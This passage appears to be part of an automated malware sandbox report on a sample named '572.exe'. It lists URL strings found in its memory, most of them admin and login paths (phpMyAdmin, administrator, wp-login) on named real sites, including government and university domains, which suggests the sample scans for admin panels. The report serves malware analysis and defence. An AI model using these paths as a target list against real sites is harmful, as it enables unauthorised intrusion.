                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405D2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/4
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405D2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/K
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/index.phpcom
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/index.phpo
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/phpmyadmin/aamorim.inovarmais.com
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/Z
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/phpmyadmin/K
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/pma/Admin/
                Source: explorer.exe, 00000002.00000000.2123596701.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2123582851.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2121884961.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/android-chrome-192x192.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-114x114.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-120x120.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-144x144.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-152x152.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-180x180.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-57x57.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-60x60.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-72x72.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-76x76.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-16x16.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-194x194.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-32x32.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-96x96.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon.ico
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/manifest.json
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/admin.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/admin.php(
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/admin.phpN
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/z
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4199132686.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/phpmyadmin/en)
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/wp-admin/hp80-
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/PhpMyAdmin/E
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/index.php
                Source: 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/index.phpams.com465990
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/index.phpet26A$
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin.php
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin.php5G&
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/adminator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/i
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/x5
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admintepec.edu.mx
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/in
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/pma/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/pma/Admin/)(
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/pma/trator/Mr
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-admin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-login.phpV
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.php6
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.phpC
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/index.phpE
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/phpmyadmin/isgr_inter_8087
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/wp-login.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/wp-login.php443
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/wp-login.phpeB
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/4
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/index.php
                Source: 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/administrator/index.phpJ
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpMyAdmin/cB
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpmyadmin/lB
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/phpmyadmin/ndes.edu.co
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sigapbanjarmasin.info/pma/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/PhpMyAdmin/7
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/administrator/index.php(
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/phpMyAdmin/f
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/phpmyadmin/.com
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/pma/yadmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/r/wp-login.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/wp-admin/NJ
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/wp-admin/Nm
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signin.rockstargames.com/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/PhpMyAdmin/-vQ
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/PhpMyAdmin//
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/admin
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/administrator/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/phpMyAdmin/n;
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/phpMyAdmin/p;
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup.takendelight.com/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4308254495.00000000315F8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/
                Source: 572.exe, 00000009.00000003.4308254495.00000000315F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/3h
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/administrator/(
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/administrator/~
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://signup2.br.leagueoflegends.com/phpMyAdmin/x21
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/administrator/M
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/administrator/MF
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sii.ittlahuac.edu.mx/phpMyAdmin/gA
